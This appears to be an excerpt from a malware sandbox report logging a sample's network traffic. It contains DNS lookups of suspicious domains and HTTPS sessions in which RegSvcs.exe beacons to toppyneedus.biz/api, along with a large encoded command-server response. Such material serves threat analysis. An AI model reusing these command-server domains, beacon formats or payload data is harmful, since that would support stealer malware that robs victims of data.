Jan 27, 2025 15:58:22.867719889 CET | 49759 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:22.868463039 CET | 49759 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:22.868478060 CET | 443 | 49759 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:23.347016096 CET | 443 | 49759 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:23.347094059 CET | 49759 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:23.348372936 CET | 49759 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:23.348377943 CET | 443 | 49759 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:23.348751068 CET | 443 | 49759 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:23.358284950 CET | 49759 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:23.358376026 CET | 49759 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:23.358422041 CET | 443 | 49759 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:24.082366943 CET | 443 | 49759 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:24.082676888 CET | 443 | 49759 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:24.082767010 CET | 49759 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:24.082889080 CET | 49759 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:24.082906008 CET | 443 | 49759 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:24.097948074 CET | 49771 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:24.097982883 CET | 443 | 49771 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:24.098092079 CET | 49771 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:24.098620892 CET | 49771 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:24.098630905 CET | 443 | 49771 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:24.600297928 CET | 443 | 49771 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:24.600431919 CET | 49771 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:24.602161884 CET | 49771 | 443 | 192.168.2.7 | 104.21.29.142
                                                                            Jan 27, 2025 15:58:24.602170944 CET44349771104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:24.602508068 CET44349771104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:24.604451895 CET49771443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:24.604603052 CET49771443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:24.604634047 CET44349771104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:24.604743004 CET49771443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:24.647334099 CET44349771104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:25.478101015 CET44349771104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:25.478213072 CET44349771104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:25.478387117 CET49771443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:25.478387117 CET49771443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:25.549873114 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:25.549911022 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:25.549999952 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:25.550508976 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:25.550529957 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:25.786463022 CET49771443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:25.786480904 CET44349771104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:26.035379887 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:26.035506964 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:26.036654949 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:26.036662102 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:26.036911964 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:26.038115978 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:26.038223982 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:26.038259029 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:26.038321018 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:26.038332939 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:26.989608049 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:26.989686966 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:26.989751101 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:26.989871025 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:26.989887953 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:27.072506905 CET49791443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:27.072526932 CET44349791104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:27.072609901 CET49791443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:27.072885036 CET49791443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:27.072895050 CET44349791104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:27.552804947 CET44349791104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:27.552936077 CET49791443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:27.554615021 CET49791443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:27.554621935 CET44349791104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:27.554853916 CET44349791104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:27.556210041 CET49791443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:27.556353092 CET49791443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:27.556379080 CET44349791104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:28.421416998 CET44349791104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:28.421781063 CET44349791104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:28.421932936 CET49791443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:28.421999931 CET49791443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:28.422017097 CET44349791104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:28.604146004 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:28.604182959 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:28.604283094 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:28.604566097 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:28.604576111 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:29.081451893 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:29.081608057 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:29.083261967 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:29.083273888 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:29.083524942 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:29.085067987 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:29.085381031 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:29.085416079 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:29.085503101 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:29.085527897 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:29.085608959 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:29.085665941 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:29.085766077 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:29.085789919 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:29.085866928 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:29.085877895 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:32.626049042 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:32.626149893 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:32.626220942 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:32.626332998 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:32.626348972 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:32.630964041 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:32.631006002 CET44349826104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:32.631088972 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:32.631388903 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:32.631403923 CET44349826104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:33.152525902 CET44349826104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:33.152601957 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:33.153860092 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:33.153868914 CET44349826104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:33.154122114 CET44349826104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:33.155380964 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:33.155422926 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:33.155455112 CET44349826104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:33.908894062 CET44349826104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:33.908971071 CET44349826104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:33.909013033 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:33.909209013 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:33.909221888 CET44349826104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:33.909235954 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:33.909240007 CET44349826104.21.29.142192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 27, 2025 15:58:13.293934107 CET | 55563 | 53 | 192.168.2.7 | 1.1.1.1
Jan 27, 2025 15:58:13.300852060 CET | 53 | 55563 | 1.1.1.1 | 192.168.2.7
Jan 27, 2025 15:58:20.435970068 CET | 53738 | 53 | 192.168.2.7 | 1.1.1.1
Jan 27, 2025 15:58:20.449383974 CET | 53 | 53738 | 1.1.1.1 | 192.168.2.7
Jan 27, 2025 15:58:20.506711006 CET | 61999 | 53 | 192.168.2.7 | 1.1.1.1
Jan 27, 2025 15:58:20.515985966 CET | 53 | 61999 | 1.1.1.1 | 192.168.2.7
Jan 27, 2025 15:58:20.519335032 CET | 61168 | 53 | 192.168.2.7 | 1.1.1.1
Jan 27, 2025 15:58:20.530950069 CET | 53 | 61168 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 27, 2025 15:58:13.293934107 CET | 192.168.2.7 | 1.1.1.1 | 0x3cef | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
Jan 27, 2025 15:58:20.435970068 CET | 192.168.2.7 | 1.1.1.1 | 0x53da | Standard query (0) | grapeprivatter.cyou | A (IP address) | IN (0x0001) | false
Jan 27, 2025 15:58:20.506711006 CET | 192.168.2.7 | 1.1.1.1 | 0x7ea | Standard query (0) | impolitewearr.biz | A (IP address) | IN (0x0001) | false
Jan 27, 2025 15:58:20.519335032 CET | 192.168.2.7 | 1.1.1.1 | 0xccb6 | Standard query (0) | toppyneedus.biz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 27, 2025 15:58:13.300852060 CET | 1.1.1.1 | 192.168.2.7 | 0x3cef | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 27, 2025 15:58:13.300852060 CET | 1.1.1.1 | 192.168.2.7 | 0x3cef | No error (0) | twc.trafficmanager.net | | 104.40.149.189 | A (IP address) | IN (0x0001) | false
Jan 27, 2025 15:58:13.357811928 CET | 1.1.1.1 | 192.168.2.7 | 0x323d | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | azurefd-t-fb-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 27, 2025 15:58:13.357811928 CET | 1.1.1.1 | 192.168.2.7 | 0x323d | No error (0) | azurefd-t-fb-prod.trafficmanager.net | dual.s-part-0017.t-0009.fb-t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 27, 2025 15:58:13.357811928 CET | 1.1.1.1 | 192.168.2.7 | 0x323d | No error (0) | dual.s-part-0017.t-0009.fb-t-msedge.net | s-part-0017.t-0009.fb-t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 27, 2025 15:58:13.357811928 CET | 1.1.1.1 | 192.168.2.7 | 0x323d | No error (0) | s-part-0017.t-0009.fb-t-msedge.net | | 13.107.253.45 | A (IP address) | IN (0x0001) | false
Jan 27, 2025 15:58:20.449383974 CET | 1.1.1.1 | 192.168.2.7 | 0x53da | Name error (3) | grapeprivatter.cyou | none | none | A (IP address) | IN (0x0001) | false
Jan 27, 2025 15:58:20.515985966 CET | 1.1.1.1 | 192.168.2.7 | 0x7ea | Name error (3) | impolitewearr.biz | none | none | A (IP address) | IN (0x0001) | false
Jan 27, 2025 15:58:20.530950069 CET | 1.1.1.1 | 192.168.2.7 | 0xccb6 | No error (0) | toppyneedus.biz | | 104.21.29.142 | A (IP address) | IN (0x0001) | false
Jan 27, 2025 15:58:20.530950069 CET | 1.1.1.1 | 192.168.2.7 | 0xccb6 | No error (0) | toppyneedus.biz | | 172.67.149.66 | A (IP address) | IN (0x0001) | false
• toppyneedus.biz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-27 14:58:21 UTC | 262 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: toppyneedus.biz
2025-01-27 14:58:21 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2025-01-27 14:58:21 UTC | 1125 | IN | HTTP/1.1 200 OK
    Date: Mon, 27 Jan 2025 14:58:21 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=89s7t6gt3fbfidba2pmmk71pp6; expires=Fri, 23 May 2025 08:45:00 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKhRUE1BHySfuCYfhK%2BiUWLSwG9inAivv4AYz5JY9cfjNpiCsYTyOMlHYewtA9161PD9%2Fv2sIRx5DCm8x9H4hBhwnlvr8YG%2FCdBecGNOYVwQmu%2BEwY6rT8EbNXu1pvVjRSo%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 908999b28d587ca8-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2014&min_rtt=1976&rtt_var=817&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1279018&cwnd=241&unsent_bytes=0&cid=0e9110c42e848d01&ts=541&x=0"
2025-01-27 14:58:21 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
    Data Ascii: 2ok
2025-01-27 14:58:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-27 14:58:22 UTC | 263 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 46
    Host: toppyneedus.biz
2025-01-27 14:58:22 UTC | 46 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4e 4e 61 57 43 4d 2d 2d 57 4f 52 4b 26 6a 3d
    Data Ascii: act=recive_message&ver=4.0&lid=NNaWCM--WORK&j=
2025-01-27 14:58:22 UTC | 1123 | IN | HTTP/1.1 200 OK
    Date: Mon, 27 Jan 2025 14:58:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=klmhb7gmtedirgm5memhr18f26; expires=Fri, 23 May 2025 08:45:01 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pJ%2FtXVsdYnATLYaDQA4B7bizV7yKHk83l2NNEjqcNvNPeqx%2FVSB8Hb6UOLRZ93VgEOLKx3CfmxdpQ88KLiid7MxG%2BC4uxAV38bquqQ7e5ZKy8wkVDcPEMQweFM0vrre7bwk%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 908999b94faa42ee-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1614&rtt_var=618&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=945&delivery_rate=1750599&cwnd=218&unsent_bytes=0&cid=b7419f22bec254da&ts=504&x=0"
2025-01-27 14:58:22 UTC | 246 | IN | Data Raw: 34 39 39 34 0d 0a 76 2b 6f 44 78 73 62 6b 50 50 4f 41 70 32 41 62 61 4e 6a 73 5a 42 54 65 74 30 34 69 77 42 49 54 61 4b 71 62 6b 68 4f 48 57 54 6a 45 79 48 58 6b 2f 4e 41 51 30 66 50 43 51 69 45 63 71 70 6b 42 4f 50 7a 57 4b 67 44 36 64 48 49 45 32 66 36 2b 4d 66 45 30 47 6f 57 4d 59 71 71 31 67 52 44 52 35 64 39 43 49 54 4f 6a 7a 67 46 36 2f 49 31 73 52 36 70 77 63 67 54 49 2b 76 6c 38 39 7a 56 62 31 34 5a 6b 72 71 4f 48 57 4a 4c 73 79 67 56 2b 44 62 6d 47 43 6e 32 7a 33 79 4d 41 37 44 42 32 45 6f 69 68 73 46 37 69 4c 56 6e 79 69 33 43 74 35 4a 6b 51 69 4b 4c 43 44 6a 6c 53 2b 6f 30 42 64 72 4c 52 4b 6b 6d 6f 65 6e 73 4d 79 66 2f 34 59 2b 34 2f 55 4e 65 49 5a 36 2b 70 6a 6b 79 66 35 73 30 4f 65 41 65 35 7a 6b 67 32 75 38 31 73
    Data Ascii: 4994v+oDxsbkPPOAp2AbaNjsZBTet04iwBITaKqbkhOHWTjEyHXk/NAQ0fPCQiEcqpkBOPzWKgD6dHIE2f6+MfE0GoWMYqq1gRDR5d9CITOjzgF6/I1sR6pwcgTI+vl89zVb14ZkrqOHWJLsygV+DbmGCn2z3yMA7DB2EoihsF7iLVnyi3Ct5JkQiKLCDjlS+o0BdrLRKkmoensMyf/4Y+4/UNeIZ6+pjkyf5s0OeAe5zkg2u81s
2025-01-27 14:58:22 UTC | 1369 | IN | Data Raw: 47 4f 49 6a 51 77 6e 5a 36 4f 56 38 39 54 30 61 77 73 5a 34 35 4b 4f 4b 48 73 6d 69 7a 51 35 33 44 37 6d 42 41 58 65 38 78 79 4e 41 6f 58 68 35 44 73 4c 32 2f 33 37 72 4d 56 33 56 67 57 61 72 6f 34 35 59 6e 75 47 46 54 44 6b 4e 6f 73 35 65 4e 70 7a 46 4c 30 4f 32 66 57 42 4b 31 37 66 70 4d 65 49 33 47 6f 58 49 5a 36 71 6c 69 31 36 44 36 73 34 4a 66 42 69 78 68 77 74 37 76 4e 67 6d 54 36 46 77 64 67 44 43 39 76 70 31 36 44 5a 63 33 59 67 68 36 75 53 42 52 74 47 36 68 53 46 38 47 72 32 43 45 44 53 47 6c 54 4d 4f 75 7a 42 32 42 6f 69 68 73 48 6e 67 4f 46 6e 57 68 32 4b 73 72 35 52 65 67 2b 54 49 42 32 73 4d 76 34 41 4d 64 61 37 66 49 6b 61 68 65 58 6f 44 7a 66 37 30 4d 61 74 37 58 63 58 49 4f 65 53 46 69 31 57 64 36 4e 49 43 4f 52 58 30 6c 30 5a 78 73 4a 56
    Data Ascii: GOIjQwnZ6OV89T0awsZ45KOKHsmizQ53D7mBAXe8xyNAoXh5DsL2/37rMV3VgWaro45YnuGFTDkNos5eNpzFL0O2fWBK17fpMeI3GoXIZ6qli16D6s4JfBixhwt7vNgmT6FwdgDC9vp16DZc3Ygh6uSBRtG6hSF8Gr2CEDSGlTMOuzB2BoihsHngOFnWh2Ksr5Reg+TIB2sMv4AMda7fIkaheXoDzf70Mat7XcXIOeSFi1Wd6NICORX0l0ZxsJV
2025-01-27 14:58:22 UTC | 1369 | IN | Data Raw: 58 31 4b 68 72 6e 33 61 61 56 6a 47 76 65 4c 64 61 65 75 78 47 75 53 37 4d 73 46 62 30 71 6c 77 42 38 32 75 39 6c 73 47 4f 4a 39 63 41 4c 4f 36 2f 39 38 35 6a 56 55 30 6f 31 75 72 4b 53 47 55 35 54 6d 7a 67 6c 36 42 37 36 63 44 48 61 30 30 43 31 4b 71 44 41 2f 53 73 2f 68 73 43 6d 6c 43 6b 33 57 79 6c 53 6e 71 6f 68 5a 68 36 4c 61 54 47 42 4b 76 59 4a 47 4c 76 7a 59 4a 45 57 6e 66 33 41 41 78 76 7a 36 66 65 30 31 57 63 2b 48 5a 61 53 6f 6a 6c 53 63 37 4d 45 4b 63 41 47 78 69 41 5a 33 74 70 56 69 41 4b 56 6f 4d 56 4b 49 7a 66 64 39 36 44 51 59 36 49 74 76 71 71 4f 51 48 6f 36 73 33 45 4a 2b 42 76 72 57 52 6e 71 31 31 53 64 4b 70 6e 42 32 42 38 33 36 39 33 4c 6f 50 46 44 54 6a 32 57 6f 72 59 74 59 6b 65 58 42 42 32 73 50 73 34 49 4b 4e 76 4b 56 4b 31 6a 69
    Data Ascii: X1Khrn3aaVjGveLdaeuxGuS7MsFb0qlwB82u9lsGOJ9cALO6/985jVU0o1urKSGU5Tmzgl6B76cDHa00C1KqDA/Ss/hsCmlCk3WylSnqohZh6LaTGBKvYJGLvzYJEWnf3AAxvz6fe01Wc+HZaSojlSc7MEKcAGxiAZ3tpViAKVoMVKIzfd96DQY6ItvqqOQHo6s3EJ+BvrWRnq11SdKpnB2B83693LoPFDTj2WorYtYkeXBB2sPs4IKNvKVK1ji
2025-01-27 14:58:22 UTC | 1369 | IN | Data Raw: 2f 31 73 43 6d 6c 4d 6c 50 50 68 6d 2b 74 71 59 42 57 6c 75 7a 49 43 58 38 42 76 59 6b 41 65 37 54 59 4b 55 4f 6a 64 48 73 59 79 2f 4c 36 66 4f 39 37 46 4a 32 50 65 65 54 38 78 6e 6d 64 79 39 55 5a 61 78 7a 36 6b 55 68 76 2f 4e 49 67 41 50 6f 77 63 67 58 42 39 76 68 35 36 6a 52 65 30 34 35 6e 71 61 47 4a 56 49 50 71 79 77 39 79 42 62 47 63 42 6e 75 34 32 53 68 49 71 58 6f 78 52 49 6a 2b 36 44 47 39 65 32 2f 51 68 32 47 6e 73 73 5a 42 33 2f 75 46 42 58 56 4b 34 73 34 4b 65 4c 7a 61 49 45 79 70 65 48 41 47 78 76 37 31 65 4f 30 7a 53 4e 79 4d 61 61 57 71 69 56 2b 56 35 38 41 47 66 67 36 38 67 55 59 34 2f 4e 49 30 41 50 6f 77 58 69 33 39 75 39 46 4c 70 53 51 55 78 4d 68 6d 71 4f 54 65 48 70 33 68 79 51 70 32 44 4c 4f 43 44 48 2b 33 32 53 64 45 72 6e 6c 30 44
    Data Ascii: /1sCmlMlPPhm+tqYBWluzICX8BvYkAe7TYKUOjdHsYy/L6fO97FJ2PeeT8xnmdy9UZaxz6kUhv/NIgAPowcgXB9vh56jRe045nqaGJVIPqyw9yBbGcBnu42ShIqXoxRIj+6DG9e2/Qh2GnssZB3/uFBXVK4s4KeLzaIEypeHAGxv71eO0zSNyMaaWqiV+V58AGfg68gUY4/NI0APowXi39u9FLpSQUxMhmqOTeHp3hyQp2DLOCDH+32SdErnl0D
2025-01-27 14:58:22 UTC | 1369 | IN | Data Raw: 33 39 7a 78 54 7a 34 5a 73 71 36 79 4f 56 35 44 6d 77 41 39 2f 42 72 43 50 41 58 69 79 33 57 77 4f 34 6e 64 70 53 70 43 35 30 57 48 2b 4b 55 7a 51 71 57 79 72 35 4a 6b 51 69 4b 4c 43 44 6a 6c 53 2b 6f 63 55 63 72 48 48 4a 55 65 73 66 33 49 59 79 66 54 37 59 2b 49 30 58 74 71 45 5a 36 75 69 68 31 75 62 37 73 49 48 63 67 57 32 7a 6b 67 32 75 38 31 73 47 4f 4a 65 65 68 6e 66 2b 76 35 36 38 79 41 61 77 73 5a 34 35 4b 4f 4b 48 73 6d 69 78 67 6c 79 44 72 71 43 42 6e 4b 78 31 54 35 50 70 58 64 34 41 64 72 7a 39 33 62 75 4d 31 48 53 6a 6e 4f 6f 71 70 52 62 67 2f 43 46 54 44 6b 4e 6f 73 35 65 4e 6f 72 53 50 46 43 68 4d 6b 41 63 79 2b 2f 37 66 4f 6c 37 52 5a 4f 52 49 61 4f 6f 78 67 62 52 35 4d 6f 4c 65 67 57 37 68 77 70 37 75 64 77 70 51 61 52 30 65 77 44 49 2f 2f
                                                                            Data Ascii: 39zxTz4Zsq6yOV5DmwA9/BrCPAXiy3WwO4ndpSpC50WH+KUzQqWyr5JkQiKLCDjlS+ocUcrHHJUesf3IYyfT7Y+I0XtqEZ6uih1ub7sIHcgW2zkg2u81sGOJeehnf+v568yAawsZ45KOKHsmixglyDrqCBnKx1T5PpXd4Adrz93buM1HSjnOoqpRbg/CFTDkNos5eNorSPFChMkAcy+/7fOl7RZORIaOoxgbR5MoLegW7hwp7udwpQaR0ewDI//
                                                                            2025-01-27 14:58:22 UTC1369INData Raw: 51 35 32 50 62 65 54 38 78 6c 32 57 34 63 51 49 63 41 61 31 69 51 4a 6b 74 74 49 2b 51 61 4e 37 66 41 62 49 39 50 31 37 35 44 4a 58 30 59 56 6d 6f 36 75 44 48 74 2b 69 77 68 6f 35 55 76 71 76 43 33 32 77 6a 6e 59 41 76 54 35 6f 53 73 2f 31 73 43 6d 6c 4f 31 44 59 67 6d 79 6e 71 34 56 4d 6b 4f 54 58 41 6e 51 41 71 49 51 4e 63 37 48 59 49 55 4f 6b 64 6e 6f 47 32 76 44 77 63 75 35 37 46 4a 32 50 65 65 54 38 78 6e 32 47 39 4d 38 46 64 52 79 78 6a 77 56 67 73 63 56 73 44 75 4a 68 64 68 75 49 6f 65 5a 68 38 6a 78 46 6b 35 45 68 6f 36 6a 47 42 74 48 6b 7a 41 52 2b 44 4c 53 63 41 33 43 7a 32 69 56 4a 70 6e 68 79 43 73 7a 39 39 33 54 6d 4e 31 48 61 69 32 36 67 72 59 68 58 6e 71 4b 4c 51 6e 34 53 2b 74 5a 47 56 36 66 57 49 45 33 69 62 7a 38 54 69 50 37 38 4d 62 31
